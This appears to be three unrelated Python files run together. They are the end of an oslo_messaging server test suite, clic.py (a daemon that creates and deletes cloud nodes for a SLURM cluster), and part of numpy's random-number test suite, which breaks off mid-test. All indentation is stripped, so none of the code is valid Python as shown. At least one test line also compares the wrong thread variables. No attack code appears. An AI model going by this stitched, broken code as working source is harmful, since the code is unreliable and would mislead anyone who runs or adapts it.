execute = _logmethod('execute')
self.executors = executors
self.server = oslo_messaging.MessageHandlingServer(mock.Mock(),
mock.Mock())
self.server._executor_cls = FakeExecutor
def test_start_stop_wait(self):
# Test a simple execution of start, stop, wait in order
thread = eventlet.spawn(self.server.start)
self.server.stop()
self.server.wait()
self.assertEqual(len(self.executors), 1)
executor = self.executors[0]
self.assertEqual(executor._calls,
['start', 'execute', 'stop', 'wait'])
self.assertTrue(executor.listener.cleanup.called)
def test_reversed_order(self):
# Test that if we call wait, stop, start, these will be correctly
# reordered
wait = eventlet.spawn(self.server.wait)
# This is non-deterministic, but there's not a great deal we can do
# about that
eventlet.sleep(0)
stop = eventlet.spawn(self.server.stop)
eventlet.sleep(0)
start = eventlet.spawn(self.server.start)
self.server.wait()
self.assertEqual(len(self.executors), 1)
executor = self.executors[0]
self.assertEqual(executor._calls,
['start', 'execute', 'stop', 'wait'])
def test_wait_for_running_task(self):
# Test that if 2 threads call a method simultaneously, both will wait,
# but only 1 will call the underlying executor method.
start_event = threading.Event()
finish_event = threading.Event()
running_event = threading.Event()
done_event = threading.Event()
runner = [None]
class SteppingFakeExecutor(self.server._executor_cls):
def start(self):
# Tell the test which thread won the race
runner[0] = eventlet.getcurrent()
running_event.set()
start_event.wait()
super(SteppingFakeExecutor, self).start()
done_event.set()
finish_event.wait()
self.server._executor_cls = SteppingFakeExecutor
start1 = eventlet.spawn(self.server.start)
start2 = eventlet.spawn(self.server.start)
# Wait until one of the threads starts running
running_event.wait()
runner = runner[0]
waiter = start2 if runner == start1 else start2
waiter_finished = threading.Event()
waiter.link(lambda _: waiter_finished.set())
# At this point, runner is running start(), and waiter() is waiting for
# it to complete. runner has not yet logged anything.
self.assertEqual(1, len(self.executors))
executor = self.executors[0]
self.assertEqual(executor._calls, [])
self.assertFalse(waiter_finished.is_set())
# Let the runner log the call
start_event.set()
done_event.wait()
# We haven't signalled completion yet, so execute shouldn't have run
self.assertEqual(executor._calls, ['start'])
self.assertFalse(waiter_finished.is_set())
# Let the runner complete
finish_event.set()
waiter.wait()
runner.wait()
# Check that both threads have finished, start was only called once,
# and execute ran
self.assertTrue(waiter_finished.is_set())
self.assertEqual(executor._calls, ['start', 'execute'])
def test_start_stop_wait_stop_wait(self):
# Test that we behave correctly when calling stop/wait more than once.
# Subsequent calls should be noops.
self.server.start()
self.server.stop()
self.server.wait()
self.server.stop()
self.server.wait()
self.assertEqual(len(self.executors), 1)
executor = self.executors[0]
self.assertEqual(executor._calls,
['start', 'execute', 'stop', 'wait'])
self.assertTrue(executor.listener.cleanup.called)
def test_state_wrapping(self):
# Test that we behave correctly if a thread waits, and the server state
# has wrapped when it it next scheduled
# Ensure that if 2 threads wait for the completion of 'start', the
# first will wait until complete_event is signalled, but the second
# will continue
complete_event = threading.Event()
complete_waiting_callback = threading.Event()
start_state = self.server._states['start']
old_wait_for_completion = start_state.wait_for_completion
waited = [False]
def new_wait_for_completion(*args, **kwargs):
if not waited[0]:
waited[0] = True
complete_waiting_callback.set()
complete_event.wait()
old_wait_for_completion(*args, **kwargs)
start_state.wait_for_completion = new_wait_for_completion
# thread1 will wait for start to complete until we signal it
thread1 = eventlet.spawn(self.server.stop)
thread1_finished = threading.Event()
thread1.link(lambda _: thread1_finished.set())
self.server.start()
complete_waiting_callback.wait()
# The server should have started, but stop should not have been called
self.assertEqual(1, len(self.executors))
self.assertEqual(self.executors[0]._calls, ['start', 'execute'])
self.assertFalse(thread1_finished.is_set())
self.server.stop()
self.server.wait()
# We should have gone through all the states, and thread1 should still
# be waiting
self.assertEqual(1, len(self.executors))
self.assertEqual(self.executors[0]._calls, ['start', 'execute',
'stop', 'wait'])
self.assertFalse(thread1_finished.is_set())
# Start again
self.server.start()
# We should now record 2 executors
self.assertEqual(2, len(self.executors))
self.assertEqual(self.executors[0]._calls, ['start', 'execute',
'stop', 'wait'])
self.assertEqual(self.executors[1]._calls, ['start', 'execute'])
self.assertFalse(thread1_finished.is_set())
# Allow thread1 to complete
complete_event.set()
thread1_finished.wait()
# thread1 should now have finished, and stop should not have been
# called again on either the first or second executor
self.assertEqual(2, len(self.executors))
self.assertEqual(self.executors[0]._calls, ['start', 'execute',
'stop', 'wait'])
self.assertEqual(self.executors[1]._calls, ['start', 'execute'])
self.assertTrue(thread1_finished.is_set())
@mock.patch.object(server_module, 'DEFAULT_LOG_AFTER', 1)
@mock.patch.object(server_module, 'LOG')
def test_logging(self, mock_log):
# Test that we generate a log message if we wait longer than
# DEFAULT_LOG_AFTER
log_event = threading.Event()
mock_log.warn.side_effect = lambda _: log_event.set()
# Call stop without calling start. We should log a wait after 1 second
thread = eventlet.spawn(self.server.stop)
log_event.wait()
# Redundant given that we already waited, but it's nice to assert
self.assertTrue(mock_log.warn.called)
thread.kill()
@mock.patch.object(server_module, 'LOG')
def test_logging_explicit_wait(self, mock_log):
# Test that we generate a log message if we wait longer than
# the number of seconds passed to log_after
log_event = threading.Event()
mock_log.warn.side_effect = lambda _: log_event.set()
# Call stop without calling start. We should log a wait after 1 second
thread = eventlet.spawn(self.server.stop, log_after=1)
log_event.wait()
# Redundant given that we already waited, but it's nice to assert
self.assertTrue(mock_log.warn.called)
thread.kill()
@mock.patch.object(server_module, 'LOG')
def test_logging_with_timeout(self, mock_log):
# Test that we log a message after log_after seconds if we've also
# specified an absolute timeout
log_event = threading.Event()
mock_log.warn.side_effect = lambda _: log_event.set()
# Call stop without calling start. We should log a wait after 1 second
thread = eventlet.spawn(self.server.stop, log_after=1, timeout=2)
log_event.wait()
# Redundant given that we already waited, but it's nice to assert
self.assertTrue(mock_log.warn.called)
thread.kill()
def test_timeout_wait(self):
# Test that we will eventually timeout when passing the timeout option
# if a preceding condition is not satisfied.
self.assertRaises(server_module.TaskTimeout,
self.server.stop, timeout=1)
def test_timeout_running(self):
# Test that we will eventually timeout if we're waiting for another
# thread to complete this task
# Start the server, which will also instantiate an executor
self.server.start()
stop_called = threading.Event()
# Patch the executor's stop method to be very slow
def slow_stop():
stop_called.set()
eventlet.sleep(10)
self.executors[0].stop = slow_stop
# Call stop in a new thread
thread = eventlet.spawn(self.server.stop)
# Wait until the thread is in the slow stop method
stop_called.wait()
# Call stop again in the main thread with a timeout
self.assertRaises(server_module.TaskTimeout,
self.server.stop, timeout=1)
thread.kill()
@mock.patch.object(server_module, 'LOG')
def test_log_after_zero(self, mock_log):
# Test that we do not log a message after DEFAULT_LOG_AFTER if the
# caller gave log_after=1
# Call stop without calling start.
self.assertRaises(server_module.TaskTimeout,
self.server.stop, log_after=0, timeout=2)
# We timed out. Ensure we didn't log anything.
self.assertFalse(mock_log.warn.called)
|
clic.py
|
#!/usr/bin/env python3
import subprocess
import os
import re
import time
import rpyc
import configparser
import fileinput
from threading import Thread
from clic import initnode
from clic import nodesup
from clic import synchosts
from clic import pssh
from clic import nodes
config = configparser.ConfigParser()
config.read('/etc/clic/clic.conf')
# Constants
settings = config['Daemon']
minRuntime = settings.getint('minRuntime')
namescheme = settings['namescheme']
import logging as loggingmod
loggingmod.basicConfig(filename=settings['logfile'], format='%(levelname)s: %(message)s', level=loggingmod.CRITICAL)
logging = loggingmod.getLogger('clic')
logging.setLevel(loggingmod.DEBUG)
isCloud = settings.getboolean('cloudHeadnode')
# Cloud settings
from clic import cloud as api
cloud = api.getCloud()
# Queue settings
isHeadnode = os.popen('hostname -s').read().strip() == namescheme or not isCloud
from clic import queue as q
queue = q.getQueue(isHeadnode, nodes.partitions)
class Job:
def __init__(self, num):
self.num = num
self.time = time.time()
def timeWaiting(self):
return time.time() - self.time
jobs = {partition : [] for partition in nodes.partitions}
def getNodesInState(state):
return {node for node in nodes.nodes if node.state == state}
def getDeletableNodes(partition):
deletable = queue.idle()
return [node for node in deletable if node.partition == partition and node.state == 'R' and node.timeInState() >= minRuntime]
def create(numToCreate, partition):
existingDisks = cloud.getDisks()
while numToCreate > 0:
# Get a valid node
while True:
node = nodes.getFreeNode(partition)
if node == None:
return
elif node.name in existingDisks:
node.setState('D')
logging.warning('Disk for {0} exists, but shouldn\'t! Deleting...'.format(node.name))
cloud.deleteDisk(node.name)
else:
break
node.setState('C')
node.errors = 0
queue.nodeChangedState(node)
logging.info('Creating {}'.format(node.name))
cloud.create(node)
numToCreate -= 1
def deleteNode(node):
node.setState('D')
logging.info('Deleting {}'.format(node.name))
queue.nodeChangedState(node)
cloud.delete(node)
#subprocess.Popen('while true; do if [ -n "`sinfo -h -N -o "%N %t" | grep "{0} " | awk \'{{print $2}}\' | grep drain`" ]; then echo Y | gcloud compute instances delete {0}; break; fi; sleep 10; done'.format(node.name), shell=True)
def mainLoop():
while True:
if not isCloud:
synchosts.addAll()
# Start with some book keeping
queueRunning = queue.running()
cloudRunning = nodesup.responds()
cloudAll = nodesup.all(False)
# Nodes that were creating and now are running:
cameUp = []
for node in cloudRunning:
if node.state == 'C':
node.setState('R')
initnode.init(node.name, node.partition.cpus, node.partition.disk, node.partition.mem)
cameUp.append(node)
logging.info('Node {} came up'.format(node.name))
if len(cameUp) > 0:
queue.configChanged()
for node in cameUp:
queue.nodeChangedState(node)
continue
# Nodes that were deleting and now are gone:
nodesWentDown = False
for node in getNodesInState('D') - cloudAll:
nodesWentDown = True
node.setState('')
queue.nodeChangedState(node)
logging.info('Node {} went down'.format(node.name))
if nodesWentDown:
# There's a chance they'll come up later with different IPs.
queue.configChanged()
continue
# Error conditions:
# We think they're up, but the cloud doesn't:
for node in getNodesInState('R') - cloudAll:
logging.warning('Node {} deleted outside of clic!'.format(node.name))
deleteNode(node)
# We think they're running, but slurm doesn't:
for node in getNodesInState('R') - queueRunning:
if node.timeInState() > 30:
logging.error('Node {} is unresponsive!'.format(node.name))
queue.restart(False, node=node)
node.errors += 1
if node.errors < 5:
# Spam a bunch of stuff to try to bring it back online
initnode.init(node.name, node.partition.cpus, node.partition.disk, node.partition.mem)
queue.restart(True, node=node)
time.sleep(5)
for node in getNodesInState('R'):
queue.restart(False, node=node)
else:
# Something is very wrong. Kill it.
node.setState('D')
logging.error('Node {} is unresponsive. Deleting...'.format(node.name))
queue.nodeChangedState(node)
cloud.delete(node)
# Nodes are running but aren't registered:
for node in cloudRunning - getNodesInState('R') - getNodesInState('D'):
logging.warning('Encountered unregistered node {}!'.format(node.name))
node.setState('R')
if not node in queueRunning:
queue.nodeChangedState(node)
# Nodes that are taking way too long to boot:
for node in getNodesInState('C'):
if node.timeInState() > 200:
logging.error('Node {} hung on boot!'.format(node.name))
# Book keeping for jobs. Modify existing structure rather than replacing because jobs keep track of wait time.
# jobs = {partition : [job, ...], ...}
# qJobs = [[jobNum, partition], ...]
qJobs = queue.queuedJobs()
# Delete dequeued jobs
for partition in jobs:
for job in jobs[partition]:
if job.num not in [qJob[0] for qJob in qJobs if qJob[1] == partition]:
jobs[partition].remove(job)
# Add new jobs
# Sometimes, immediately after slurmctld restarts, running jobs are listed as queued. Only queue jobs with a number greater than any other job.
sampleNum = 0
for partition in jobs:
for job in jobs[partition]:
if int(job.num) > sampleNum:
sampleNum = int(job.num)
for qJob in qJobs:
if qJob[1] in jobs and qJob[0] not in [job.num for job in jobs[qJob[1]]] and int(qJob[0]) > sampleNum:
jobs[qJob[1]].append(Job(qJob[0]))
# Create and delete nodes
for partition in jobs:
deletable = getDeletableNodes(partition)
creating = {node for node in getNodesInState('C') if node.partition == partition}
running = {node for node in getNodesInState('R') if node.partition == partition}
if len(creating) + len(running) == 0 and len(jobs[partition]) > 0:
create(int((len(jobs[partition]) + 1) / 2), partition)
else:
# SLURM may not have had the chance to utilize some "running" nodes
unutilized = 0
for node in running:
if node.timeInState() < 60:
unutilized += 1
jobsWaitingTooLong = [job for job in jobs[partition] if job.timeWaiting() > 30]
create(int((len(jobsWaitingTooLong) + 1) / 2 - len(creating) - len(deletable) - unutilized), partition)
# Delete nodes
if len(deletable) > 0 and len(jobs[partition]) == 0:
for node in deletable[0:int((len(deletable) + 1) / 2)]:
deleteNode(node)
class exportNodes(rpyc.Service):
def on_connect(self):
pass
def on_disconnect(self):
pass
def exposed_getNodes(self):
return nodes.nodes
def startServer():
if __name__ == "__main__":
from rpyc.utils.server import ThreadedServer
t = ThreadedServer(exportNodes, hostname='localhost', port=18861, protocol_config={'allow_public_attrs':True})
t.start()
def main():
import argparse
parser = argparse.ArgumentParser(description='Start the clic daemon')
from clic import version
parser.add_argument('-v', '--version', action='version', version=version.__version__)
parser.parse_args()
Thread(target = startServer).start()
if isHeadnode:
# This is the head node
logging.info('Starting clic as a head node')
# Sort out ssh keys
from clic import copyid
copyid.refresh(True)
copyid.copyAll(True)
copyid.send()
queue.restart(True)
mainLoop()
else:
# This is a compute node
logging.info('Starting clic as a compute node')
|
test_random.py
|
from __future__ import division, absolute_import, print_function
import warnings
import numpy as np
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_warns,
assert_no_warnings, assert_array_equal, assert_array_almost_equal,
suppress_warnings
)
from numpy import random
import sys
import warnings
class TestSeed(object):
def test_scalar(self):
s = np.random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = np.random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = np.random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = np.random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, -0.5)
assert_raises(ValueError, np.random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, [-0.5])
assert_raises(ValueError, np.random.RandomState, [-1])
assert_raises(ValueError, np.random.RandomState, [4294967296])
assert_raises(ValueError, np.random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, np.random.RandomState, [1, -2, 4294967296])
def test_invalid_array_shape(self):
# gh-9832
assert_raises(ValueError, np.random.RandomState, np.array([], dtype=np.int64))
assert_raises(ValueError, np.random.RandomState, [[1, 2, 3]])
assert_raises(ValueError, np.random.RandomState, [[1, 2, 3],
[4, 5, 6]])
class TestBinomial(object):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(object):
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, np.random.multinomial, 1, p,
float(1))
class TestSetState(object):
def setup(self):
self.seed = 1234567890
self.prng = random.RandomState(self.seed)
self.state = self.prng.get_state()
def test_basic(self):
old = self.prng.tomaxint(16)
self.prng.set_state(self.state)
new = self.prng.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.prng.standard_normal(size=3)
self.prng.set_state(self.state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.prng.standard_normal()
state = self.prng.get_state()
old = self.prng.standard_normal(size=3)
self.prng.set_state(state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.prng.standard_normal(size=16)
self.prng.set_state(old_state)
x2 = self.prng.standard_normal(size=16)
self.prng.set_state(self.state)
x3 = self.prng.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.prng.negative_binomial(0.5, 0.5)
class TestRandint(object):
rfunc = np.random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_full_range(self):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
try:
self.rfunc(lbnd, ubnd, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self):
# Don't use fixed seed
np.random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool_)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
import hashlib
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '7dd3170d7aa461d201a65f8bcf3944b0',
'int16': '1b7741b80964bb190c50d541dca1cac1',
'int32': '4dc9fcc2b395577ebb51793e58ed1a05',
'int64': '17db902806f448331b5a758d7d2ee672',
'int8': '27dd30c4e08a797063dffac2490b0be6',
'uint16': '1b7741b80964bb190c50d541dca1cac1',
'uint32': '4dc9fcc2b395577ebb51793e58ed1a05',
'uint64': '17db902806f448331b5a758d7d2ee672',
'uint8': '27dd30c4e08a797063dffac2490b0be6'}
for dt in self.itype[1:]:
np.random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
np.random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_int64_uint64_corner_case(self):
# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it be round down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1)
# None of these function calls should
# generate a ValueError now.
actual = np.random.randint(lbnd, ubnd, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_equal(sample.dtype, np.dtype(dt))
for dt in (bool, int, np.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_(not hasattr(sample, 'dtype'))
assert_equal(type(sample), dt)
class TestRandomDist(object):
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_rand(self):
np.random.seed(self.seed)
actual = np.random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
np.random.seed(self.seed)
actual = np.random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randint(self):
np.random.seed(self.seed)
actual = np.random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers(self):
np.random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
assert_(len(w) == 1)
desired = np.iinfo('l').max
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random_sample(self):
np.random.seed(self.seed)
actual = np.random.random_sample((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_choice_uniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False,
p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
np.random.seed(self.seed)
actual = np.random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = np.random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(np.random.choice(2, replace=True)))
assert_(np.isscalar(np.random.choice(2, replace=False)))
assert_(np.isscalar(np.random.choice(2, replace=True, p=p)))
assert_(np.isscalar(np.random.choice(2, replace=False, p=p)))
assert_(np.isscalar(np.random.choice([1, 2], replace=True)))
assert_(np.random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(np.random.choice(2, s, replace=True)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False)))
assert_(not np.isscalar(np.random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(np.random.choice([1, 2], s, replace=True)))
assert_(np.random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(np.random.choice(6, s, replace=True).shape, s)
assert_equal(np.random.choice(6, s, replace=False).shape, s)
assert_equal(np.random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(np.random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(np.random.choice(np.arange(6), s, replace=True).shape, s)
def test_bytes(self):
np.random.seed(self.seed)
actual = np.random.bytes(10)
desired = b'\x82Ui\x9e\xff\x97+Wf\xa5'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, 1),
("b", np.int32, 1)])]:
np.random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
np.random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
np.random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
np.random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_beta(self):
np.random.seed(self.seed)
actual = np.random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
np.random.seed(self.seed)
actual = np.random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
assert_array_equal(actual, desired)
def test_chisquare(self):
np.random.seed(self.seed)
actual = np.random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
np.random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = np.random.mtrand.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, np.random.dirichlet, p, float(1))
